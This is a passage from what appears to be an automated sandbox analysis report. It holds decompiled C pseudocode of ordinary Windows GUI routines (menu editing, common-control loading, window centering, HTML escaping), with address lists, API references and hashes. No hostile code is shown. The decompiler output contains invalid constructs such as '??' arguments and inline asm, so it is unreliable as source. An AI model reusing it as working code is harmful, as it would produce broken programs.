							ModifyMenuW(_a8, _v4, 0x400, _t67,  &_a8256);
						}
						goto L12;
						L14:
						_v4 = _v4 + 1;
						_t39 = _v4;
					} while (_t39 < _a4);
					goto L15;
				}
			}












                                                                                                                                                      0x0040699e
                                                                                                                                                      0x004069a1
                                                                                                                                                      0x004069a9
                                                                                                                                                      0x004069b4
                                                                                                                                                      0x004069be
                                                                                                                                                      0x004069c2
                                                                                                                                                      0x004069c6
                                                                                                                                                      0x00406af3
                                                                                                                                                      0x00406af9
                                                                                                                                                      0x004069cc
                                                                                                                                                      0x004069d1
                                                                                                                                                      0x004069d8
                                                                                                                                                      0x004069dd
                                                                                                                                                      0x004069e4
                                                                                                                                                      0x004069f3
                                                                                                                                                      0x004069fe
                                                                                                                                                      0x00406a06
                                                                                                                                                      0x00406a0e
                                                                                                                                                      0x00406a1b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00406a26
                                                                                                                                                      0x00406acb
                                                                                                                                                      0x00406acb
                                                                                                                                                      0x00406acf
                                                                                                                                                      0x00406ad1
                                                                                                                                                      0x00406ad2
                                                                                                                                                      0x00406ad6
                                                                                                                                                      0x00406ad9
                                                                                                                                                      0x00406ade
                                                                                                                                                      0x00406ade
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00406acf
                                                                                                                                                      0x00406a2c
                                                                                                                                                      0x00406a3a
                                                                                                                                                      0x00406a42
                                                                                                                                                      0x00406a4e
                                                                                                                                                      0x00406a53
                                                                                                                                                      0x00406a5a
                                                                                                                                                      0x00406a5e
                                                                                                                                                      0x00406a63
                                                                                                                                                      0x00406a71
                                                                                                                                                      0x00406a77
                                                                                                                                                      0x00406a7d
                                                                                                                                                      0x00406a7d
                                                                                                                                                      0x00406a65
                                                                                                                                                      0x00406a69
                                                                                                                                                      0x00406a69
                                                                                                                                                      0x00406a63
                                                                                                                                                      0x00406a8c
                                                                                                                                                      0x00406a94
                                                                                                                                                      0x00406a95
                                                                                                                                                      0x00406a9b
                                                                                                                                                      0x00406aa9
                                                                                                                                                      0x00406aaf
                                                                                                                                                      0x00406aaf
                                                                                                                                                      0x00406ac5
                                                                                                                                                      0x00406ac5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00406ae1
                                                                                                                                                      0x00406ae1
                                                                                                                                                      0x00406ae5
                                                                                                                                                      0x00406ae9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004069d1

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                                                                      • String ID: 0$6
                                                                                                                                                      • API String ID: 4066108131-3849865405
                                                                                                                                                      • Opcode ID: 89f899f7243dee98bcbd5a103440f16ff97d5f32f15a1ba4fc358b67112b384b
                                                                                                                                                      • Instruction ID: b215381df5749c23a569ed6f67112db3caf5a45f0159d48b34fa9b4edc30ae2f
                                                                                                                                                      • Opcode Fuzzy Hash: 89f899f7243dee98bcbd5a103440f16ff97d5f32f15a1ba4fc358b67112b384b
                                                                                                                                                      • Instruction Fuzzy Hash: D731AFB2508344AFCB209F91C84099BB7E8EF84314F04893EFA49A2291D775D914CF9A
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00402754, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 58%
                                                                                                                                                      			E00402754(void* __ecx) {
				intOrPtr _v8;
				char _v12;
				struct HWND__* _t6;
				_Unknown_base(*)()* _t11;
				struct HWND__* _t15;
				void* _t20;
				struct HINSTANCE__* _t23;

				_v12 = 8;
				_v8 = 0xff;
				_t15 = 0;
				_t20 = 0;
				_t23 = LoadLibraryW(L"comctl32.dll");
				if(_t23 == 0) {
					L5:
					__imp__#17();
					_t6 = 1;
					L6:
					if(_t6 != 0) {
						return 1;
					} else {
						MessageBoxW(_t6, L"Error: Cannot load the common control classes.", L"Error", 0x30);
						return 0;
					}
				}
				_t11 = GetProcAddress(_t23, "InitCommonControlsEx");
				if(_t11 != 0) {
					_t20 = 1;
					_t15 =  *_t11( &_v12);
				}
				FreeLibrary(_t23);
				if(_t20 == 0) {
					goto L5;
				} else {
					_t6 = _t15;
					goto L6;
				}
			}










                                                                                                                                                      0x00402761
                                                                                                                                                      0x00402768
                                                                                                                                                      0x0040276f
                                                                                                                                                      0x00402771
                                                                                                                                                      0x00402779
                                                                                                                                                      0x0040277d
                                                                                                                                                      0x004027a7
                                                                                                                                                      0x004027a7
                                                                                                                                                      0x004027af
                                                                                                                                                      0x004027b0
                                                                                                                                                      0x004027b5
                                                                                                                                                      0x004027d2
                                                                                                                                                      0x004027b7
                                                                                                                                                      0x004027c4
                                                                                                                                                      0x004027cd
                                                                                                                                                      0x004027cd
                                                                                                                                                      0x004027b5
                                                                                                                                                      0x00402785
                                                                                                                                                      0x0040278d
                                                                                                                                                      0x00402793
                                                                                                                                                      0x00402796
                                                                                                                                                      0x00402796
                                                                                                                                                      0x00402799
                                                                                                                                                      0x004027a1
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004027a3
                                                                                                                                                      0x004027a3
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004027a3

                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040BEB0,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 00402773
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00402785
                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040BEB0,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 00402799
                                                                                                                                                      • #17.COMCTL32(?,00000002,?,?,?,0040BEB0,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 004027A7
                                                                                                                                                      • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004027C4
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                      • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                      • API String ID: 2780580303-317687271
                                                                                                                                                      • Opcode ID: 8b95306214ac587ba0897fcd046ca2e4eeea29109f78b8f4090a977e67bd8f40
                                                                                                                                                      • Instruction ID: 71d6d288c8c0cbb2a230865f183c91b33313cb8a4c206b23d80a388f73b59e38
                                                                                                                                                      • Opcode Fuzzy Hash: 8b95306214ac587ba0897fcd046ca2e4eeea29109f78b8f4090a977e67bd8f40
                                                                                                                                                      • Instruction Fuzzy Hash: 0B01D1763612116BD3315BB49D8DB7F7AD8EB81759B10403AF502F36C0EAB8C90982AD
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00405B17, Relevance: 15.1, APIs: 10, Instructions: 111COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 85%
                                                                                                                                                      			E00405B17(void* __edx, struct HWND__* _a4, signed int _a8) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				int _t50;
				long _t61;
				struct HDC__* _t63;
				intOrPtr _t65;
				intOrPtr _t68;
				struct HWND__* _t71;
				intOrPtr _t72;
				void* _t73;
				int _t74;
				int _t80;
				int _t83;

				_t73 = __edx;
				_v8 = 0;
				_v12 = 0;
				_t74 = GetSystemMetrics(0x11);
				_t80 = GetSystemMetrics(0x10);
				if(_t74 == 0 || _t80 == 0) {
					_t63 = GetDC(0);
					_t80 = GetDeviceCaps(_t63, 8);
					_t74 = GetDeviceCaps(_t63, 0xa);
					ReleaseDC(0, _t63);
				}
				GetWindowRect(_a4,  &_v44);
				if((_a8 & 0x00000004) != 0) {
					_t71 = GetParent(_a4);
					if(_t71 != 0) {
						_v28.left = _v28.left & 0x00000000;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						GetWindowRect(_t71,  &_v28);
						_t61 = _v28.left;
						_t72 = _v28.top;
						_t80 = _v28.right - _t61 + 1;
						_t74 = _v28.bottom - _t72 + 1;
						_v8 = _t61;
						_v12 = _t72;
					}
				}
				_t65 = _v44.right;
				if((_a8 & 0x00000001) == 0) {
					asm("cdq");
					_t83 = (_v44.left - _t65 + _t80 - 1 - _t73 >> 1) + _v8;
				} else {
					_t83 = 0;
				}
				_t68 = _v44.bottom;
				if((_a8 & 0x00000002) != 0) {
					L11:
					_t50 = 0;
					goto L12;
				} else {
					asm("cdq");
					_t50 = (_v44.top - _t68 + _t74 - 1 - _t73 >> 1) + _v12;
					if(_t50 >= 0) {
						L12:
						if(_t83 < 0) {
							_t83 = 0;
						}
						return MoveWindow(_a4, _t83, _t50, _t65 - _v44.left + 1, _t68 - _v44.top + 1, 1);
					}
					goto L11;
				}
			}


















                                                                                                                                                      0x00405b17
                                                                                                                                                      0x00405b2a
                                                                                                                                                      0x00405b2d
                                                                                                                                                      0x00405b34
                                                                                                                                                      0x00405b3a
                                                                                                                                                      0x00405b3c
                                                                                                                                                      0x00405b4f
                                                                                                                                                      0x00405b59
                                                                                                                                                      0x00405b60
                                                                                                                                                      0x00405b62
                                                                                                                                                      0x00405b62
                                                                                                                                                      0x00405b75
                                                                                                                                                      0x00405b7b
                                                                                                                                                      0x00405b86
                                                                                                                                                      0x00405b8a
                                                                                                                                                      0x00405b8c
                                                                                                                                                      0x00405b95
                                                                                                                                                      0x00405b96
                                                                                                                                                      0x00405b97
                                                                                                                                                      0x00405b9d
                                                                                                                                                      0x00405b9f
                                                                                                                                                      0x00405ba5
                                                                                                                                                      0x00405baf
                                                                                                                                                      0x00405bb0
                                                                                                                                                      0x00405bb1
                                                                                                                                                      0x00405bb4
                                                                                                                                                      0x00405bb4
                                                                                                                                                      0x00405b8a
                                                                                                                                                      0x00405bbb
                                                                                                                                                      0x00405bbe
                                                                                                                                                      0x00405bcd
                                                                                                                                                      0x00405bd4
                                                                                                                                                      0x00405bc0
                                                                                                                                                      0x00405bc0
                                                                                                                                                      0x00405bc0
                                                                                                                                                      0x00405bdb
                                                                                                                                                      0x00405bde
                                                                                                                                                      0x00405bf3
                                                                                                                                                      0x00405bf3
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00405be0
                                                                                                                                                      0x00405be9
                                                                                                                                                      0x00405bee
                                                                                                                                                      0x00405bf1
                                                                                                                                                      0x00405bf5
                                                                                                                                                      0x00405bf7
                                                                                                                                                      0x00405bf9
                                                                                                                                                      0x00405bf9
                                                                                                                                                      0x00405c16
                                                                                                                                                      0x00405c16
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00405bf1

                                                                                                                                                      APIs
                                                                                                                                                      • GetSystemMetrics.USER32 ref: 00405B30
                                                                                                                                                      • GetSystemMetrics.USER32 ref: 00405B36
                                                                                                                                                      • GetDC.USER32(00000000), ref: 00405B43
                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 00405B54
                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00405B5B
                                                                                                                                                      • ReleaseDC.USER32 ref: 00405B62
                                                                                                                                                      • GetWindowRect.USER32 ref: 00405B75
                                                                                                                                                      • GetParent.USER32(?), ref: 00405B80
                                                                                                                                                      • GetWindowRect.USER32 ref: 00405B9D
                                                                                                                                                      • MoveWindow.USER32(?,?,00000000,?,?,00000001), ref: 00405C0C
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2163313125-0
                                                                                                                                                      • Opcode ID: 62d34707e84acb0b8d4d630ad042eb52563104a98599b23053d4d9526d36ec3e
                                                                                                                                                      • Instruction ID: 16e951d772d83260d2b373081c0788c8dcba8c3ecadbacc9f3e1e8367de9e11c
                                                                                                                                                      • Opcode Fuzzy Hash: 62d34707e84acb0b8d4d630ad042eb52563104a98599b23053d4d9526d36ec3e
                                                                                                                                                      • Instruction Fuzzy Hash: F6316072900619AFDB10CFB8CD85AEEBBB8EB48314F054179E901F7290DA75BD458F94
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00401ED6, Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 176COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 98%
                                                                                                                                                      			E00401ED6(signed int __ecx, void* __edx, intOrPtr* _a4) {
				char _v516;
				char _v520;
				intOrPtr _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				void _v546;
				char _v548;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				intOrPtr _v576;
				int _v580;
				short _v582;
				void _v584;
				intOrPtr _v588;
				signed int _v592;
				signed int _v596;
				wchar_t* _v600;
				signed int _v604;
				intOrPtr _v624;
				char _v632;
				void* __ebx;
				void* __edi;
				signed int _t73;
				signed int _t74;
				signed int _t76;
				signed int _t97;
				signed int _t104;
				int _t124;
				intOrPtr _t126;
				signed int _t127;
				void* _t131;
				intOrPtr* _t151;
				signed int _t153;
				void* _t156;
				void* _t157;

				_t134 = __ecx;
				_v592 = __ecx;
				_v584 = 0;
				_v582 = 0;
				_v580 = 0;
				_v588 = 0x40f634;
				_t73 = memset( &_v584, 0, 0x44);
				_t126 =  *0x41235c; // 0x0
				_t151 = _a4;
				_t74 = _t73 | 0xffffffff;
				_t156 = (_t153 & 0xfffffff8) - 0x254 + 0xc;
				_v572 = _t74;
				_v568 = _t74;
				_v564 = _t74;
				_v560 = _t74;
				_t127 = _t126 - 1;
				_v520 = 0;
				_v600 =  *((intOrPtr*)(_t151 + 0x28));
				if(_t127 < 0) {
					L3:
					_t127 = _t127 | 0xffffffff;
				} else {
					while(1) {
						_t124 = wcscmp(_v600, E00406306(0x412340, _t127));
						_pop(_t134);
						if(_t124 == 0) {
							goto L4;
						}
						_t127 = _t127 - 1;
						if(_t127 >= 0) {
							continue;
						} else {
							goto L3;
						}
						goto L4;
					}
				}
				L4:
				if(_t127 != 0xffffffff) {
					_t76 = _t127;
				} else {
					_t76 = E00406264(0x412340, _t134, _v600);
				}
				_v556 = _t76;
				_v524 =  *((intOrPtr*)(_t151 + 0x2c));
				_v548 =  *_t151;
				_v544 =  *((intOrPtr*)(_t151 + 4));
				_v540 =  *((intOrPtr*)(_t151 + 8));
				_v536 =  *((intOrPtr*)(_t151 + 0xc));
				_v532 =  *((intOrPtr*)(_t151 + 0x10));
				_t129 = _v592 + 0x84c;
				_v528 =  *((intOrPtr*)(_t151 + 0x14));
				_v596 = _v592 + 0x84c;
				E00406434(_v592 + 0x84c,  *((intOrPtr*)(_t151 + 0x20)), 0xffffffff, 0);
				_v580 = E00406264(0x412320, _t134, E0040636E(_t129));
				E00406434(_t129,  *((intOrPtr*)(_t151 + 0x24)), 0xffffffff, 0);
				_v592 = E00406264(0x412320, _t134, E0040636E(_t129));
				_t131 = _v624 + 0x860;
				 *((intOrPtr*)(_t131 + 0x1c)) = 0;
				 *((intOrPtr*)(_t131 + 4)) = 0;
				_v632 = 0;
				_v548 = 0;
				memset( &_v546, 0, 0x1fe);
				_t97 = E0040610D(_t134,  &_v632,  &_v548, 0xff,  *((intOrPtr*)(_t151 + 0x1c)), ".", 0);
				_t157 = _t156 + 0x20;
				while(_t97 != 0) {
					E00406264(_t131, _t134,  &_v516);
					_t97 = E0040610D(_t134,  &_v604,  &_v520, 0xff,  *((intOrPtr*)(_t151 + 0x1c)), ".", 0);
					_t157 = _t157 + 0x14;
				}
				E0040637A(_t97 | 0xffffffff, _v596, 0x40f454);
				_t104 = _v596;
				_v604 = _v604 & 0x00000000;
				if( *((intOrPtr*)(_t104 + 0x87c)) > 0) {
					do {
						if(_v600 != 0) {
							_t166 = _t104 | 0xffffffff;
							E004063DD(_t104 | 0xffffffff, _t134, _v596, _t104 | 0xffffffff, ".");
						}
						E004063DD(E00406306(_t131,  *((intOrPtr*)(_v592 + 0x87c)) - _v600 - 1) | 0xffffffff,  *((intOrPtr*)(_v592 + 0x87c)) - _v600 - 1, _v596, _t166, _t116);
						_v604 = _v604 + 1;
						_t104 = _v596;
						_t134 = _v604;
					} while (_v604 <  *((intOrPtr*)(_t104 + 0x87c)));
				}
				_v576 = E00406264(0x412320, _t134, E0040636E(_v596));
				_v576 = E00406264(0x412320, _t134,  *((intOrPtr*)(_t151 + 0x18)));
				return E00408603( &(_v600[0xffffffffffffff2d]),  &_v596, _t134);
			}












































                                                                                                                                                      0x00401ed6
                                                                                                                                                      0x00401eef
                                                                                                                                                      0x00401ef3
                                                                                                                                                      0x00401ef8
                                                                                                                                                      0x00401efd
                                                                                                                                                      0x00401f01
                                                                                                                                                      0x00401f09
                                                                                                                                                      0x00401f0e
                                                                                                                                                      0x00401f14
                                                                                                                                                      0x00401f17
                                                                                                                                                      0x00401f1a
                                                                                                                                                      0x00401f1d
                                                                                                                                                      0x00401f21
                                                                                                                                                      0x00401f25
                                                                                                                                                      0x00401f29
                                                                                                                                                      0x00401f30
                                                                                                                                                      0x00401f33
                                                                                                                                                      0x00401f37
                                                                                                                                                      0x00401f3b
                                                                                                                                                      0x00401f5c
                                                                                                                                                      0x00401f5c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401f3d
                                                                                                                                                      0x00401f4e
                                                                                                                                                      0x00401f56
                                                                                                                                                      0x00401f57
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401f59
                                                                                                                                                      0x00401f5a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401f5a
                                                                                                                                                      0x00401f3d
                                                                                                                                                      0x00401f5f
                                                                                                                                                      0x00401f62
                                                                                                                                                      0x00401f74
                                                                                                                                                      0x00401f64
                                                                                                                                                      0x00401f6d
                                                                                                                                                      0x00401f6d
                                                                                                                                                      0x00401f7a
                                                                                                                                                      0x00401f81
                                                                                                                                                      0x00401f87
                                                                                                                                                      0x00401f8e
                                                                                                                                                      0x00401f95
                                                                                                                                                      0x00401f9c
                                                                                                                                                      0x00401fa9
                                                                                                                                                      0x00401fb0
                                                                                                                                                      0x00401fb6
                                                                                                                                                      0x00401fba
                                                                                                                                                      0x00401fbe
                                                                                                                                                      0x00401fdb
                                                                                                                                                      0x00401fdf
                                                                                                                                                      0x00401fff
                                                                                                                                                      0x00402007
                                                                                                                                                      0x0040200f
                                                                                                                                                      0x00402012
                                                                                                                                                      0x00402015
                                                                                                                                                      0x00402019
                                                                                                                                                      0x0040201e
                                                                                                                                                      0x0040203a
                                                                                                                                                      0x0040203f
                                                                                                                                                      0x00402070
                                                                                                                                                      0x0040204b
                                                                                                                                                      0x00402068
                                                                                                                                                      0x0040206d
                                                                                                                                                      0x0040206d
                                                                                                                                                      0x00402080
                                                                                                                                                      0x00402085
                                                                                                                                                      0x00402089
                                                                                                                                                      0x00402095
                                                                                                                                                      0x00402097
                                                                                                                                                      0x0040209c
                                                                                                                                                      0x004020a7
                                                                                                                                                      0x004020aa
                                                                                                                                                      0x004020aa
                                                                                                                                                      0x004020cd
                                                                                                                                                      0x004020d2
                                                                                                                                                      0x004020d6
                                                                                                                                                      0x004020da
                                                                                                                                                      0x004020de
                                                                                                                                                      0x00402097
                                                                                                                                                      0x004020ff
                                                                                                                                                      0x0040210a
                                                                                                                                                      0x00402126

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset$wcscmp
                                                                                                                                                      • String ID: #A$ #A$ #A$@#A$@#A
                                                                                                                                                      • API String ID: 243296809-3329557610
                                                                                                                                                      • Opcode ID: 22725e31c05f3c2c753fedfd645125ca20493b01ca7e0e87f454b40cccc93761
                                                                                                                                                      • Instruction ID: dbc7ccb7a4322fbd292e3ccaf68edd9f7786ca1a27a33b966897527a52c99039
                                                                                                                                                      • Opcode Fuzzy Hash: 22725e31c05f3c2c753fedfd645125ca20493b01ca7e0e87f454b40cccc93761
                                                                                                                                                      • Instruction Fuzzy Hash: D2612D715083419FC310EF6AC981A1BB7E4AF88324F108A3EF5A9E72E1D779D4158B5A
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0040DBDA, Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 16%
                                                                                                                                                      			E0040DBDA(signed short* __eax, void* __ecx) {
				void* _t2;
				signed short* _t3;
				void* _t7;
				void* _t8;
				void* _t10;

				_t3 = __eax;
				_t8 = __ecx;
				_t7 = 8;
				while(1) {
					_t2 =  *_t3 & 0x0000ffff;
					if(_t2 != 0x3c) {
						goto L3;
					}
					_push(_t7);
					_push(L"&lt;");
					L14:
					_t2 = memcpy(_t8, ??, ??);
					_t10 = _t10 + 0xc;
					_t8 = _t8 + _t7;
					L16:
					if( *_t3 != 0) {
						_t3 =  &(_t3[1]);
						continue;
					}
					return _t2;
					L3:
					if(_t2 != 0x3e) {
						if(_t2 != 0x22) {
							if((_t2 & 0x0000ffff) != 0xffffffb0) {
								if(_t2 != 0x26) {
									if(_t2 != 0xa) {
										 *_t8 = _t2;
										_t8 = _t8 + 2;
									} else {
										_push(_t7);
										_push(L"<br>");
										goto L14;
									}
								} else {
									_push(0xa);
									_push(L"&amp;");
									goto L11;
								}
							} else {
								_push(0xa);
								_push(L"&deg;");
								L11:
								_t2 = memcpy(_t8, ??, ??);
								_t10 = _t10 + 0xc;
								_t8 = _t8 + 0xa;
							}
						} else {
							_t2 = memcpy(_t8, L"&quot;", 0xc);
							_t10 = _t10 + 0xc;
							_t8 = _t8 + 0xc;
						}
					} else {
						_push(_t7);
						_push(L"&gt;");
						goto L14;
					}
					goto L16;
				}
			}








                                                                                                                                                      0x0040dbdf
                                                                                                                                                      0x0040dbe1
                                                                                                                                                      0x0040dbe3
                                                                                                                                                      0x0040dbe4
                                                                                                                                                      0x0040dbe4
                                                                                                                                                      0x0040dbeb
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040dbed
                                                                                                                                                      0x0040dbee
                                                                                                                                                      0x0040dc56
                                                                                                                                                      0x0040dc57
                                                                                                                                                      0x0040dc5c
                                                                                                                                                      0x0040dc5f
                                                                                                                                                      0x0040dc68
                                                                                                                                                      0x0040dc6c
                                                                                                                                                      0x0040dc6f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040dc6f
                                                                                                                                                      0x0040dc78
                                                                                                                                                      0x0040dbf5
                                                                                                                                                      0x0040dbf9
                                                                                                                                                      0x0040dc07
                                                                                                                                                      0x0040dc24
                                                                                                                                                      0x0040dc33
                                                                                                                                                      0x0040dc4e
                                                                                                                                                      0x0040dc63
                                                                                                                                                      0x0040dc67
                                                                                                                                                      0x0040dc50
                                                                                                                                                      0x0040dc50
                                                                                                                                                      0x0040dc51
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040dc51
                                                                                                                                                      0x0040dc35
                                                                                                                                                      0x0040dc35
                                                                                                                                                      0x0040dc37
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040dc37
                                                                                                                                                      0x0040dc26
                                                                                                                                                      0x0040dc26
                                                                                                                                                      0x0040dc28
                                                                                                                                                      0x0040dc3c
                                                                                                                                                      0x0040dc3d
                                                                                                                                                      0x0040dc42
                                                                                                                                                      0x0040dc45
                                                                                                                                                      0x0040dc45
                                                                                                                                                      0x0040dc09
                                                                                                                                                      0x0040dc11
                                                                                                                                                      0x0040dc16
                                                                                                                                                      0x0040dc19
                                                                                                                                                      0x0040dc19
                                                                                                                                                      0x0040dbfb
                                                                                                                                                      0x0040dbfb
                                                                                                                                                      0x0040dbfc
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040dbfc
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040dbf9

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcpy
                                                                                                                                                      • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                      • API String ID: 3510742995-3273207271
                                                                                                                                                      • Opcode ID: e515d9530c1f27c32394133f4687b1e06294851c867495ee72b8dfb23976abf6
                                                                                                                                                      • Instruction ID: 0c92722b5564fee70601bedc3038ef5bb71485c7004a8157c6d80a0c5a0d985f
                                                                                                                                                      • Opcode Fuzzy Hash: e515d9530c1f27c32394133f4687b1e06294851c867495ee72b8dfb23976abf6
                                                                                                                                                      • Instruction Fuzzy Hash: E001C0A2E6826061FA3021968C86FBA15549BA2B10FA0013BB986352C6D1FD09CFC15F
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00406827, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 59%
                                                                                                                                                      			E00406827(signed short __ebx) {
				signed int _t21;
				void* _t22;
				intOrPtr _t23;
				struct HINSTANCE__* _t25;
				signed int _t27;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				void* _t35;
				signed short _t39;
				signed int _t40;
				signed int _t42;
				intOrPtr _t43;
				signed int _t44;
				intOrPtr _t45;
				intOrPtr _t46;
				intOrPtr _t49;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				void* _t57;
				int _t61;
				void* _t62;
				int _t71;
				void* _t72;
				void* _t73;

				_t39 = __ebx;
				if( *0x413288 == 0) {
					E00406785();
				}
				_t40 =  *0x413280; // 0x18
				_t21 = 0;
				if(_t40 <= 0) {
					L5:
					_t57 = 0;
				} else {
					while(1) {
						_t55 =  *0x413278; // 0x9a7120
						if(_t39 ==  *((intOrPtr*)(_t55 + _t21 * 4))) {
							break;
						}
						_t21 = _t21 + 1;
						if(_t21 < _t40) {
							continue;
						} else {
							goto L5;
						}
						goto L6;
					}
					_t52 =  *0x41327c; // 0x9a7528
					_t53 =  *0x413270; // 0x2150048
					_t57 = _t53 +  *(_t52 + _t21 * 4) * 2;
				}
				L6:
				if(_t57 != 0) {
					L21:
					_t22 = _t57;
				} else {
					if((_t39 & 0x00010000) == 0) {
						if( *0x412c38 == 0) {
							_t23 =  *0x413290; // 0x1000
							_push(_t23 - 1);
							_push( *0x413274);
							_push(_t39);
							_t25 = E0040698D();
							goto L15;
						} else {
							wcscpy(0x412e48, L"strings");
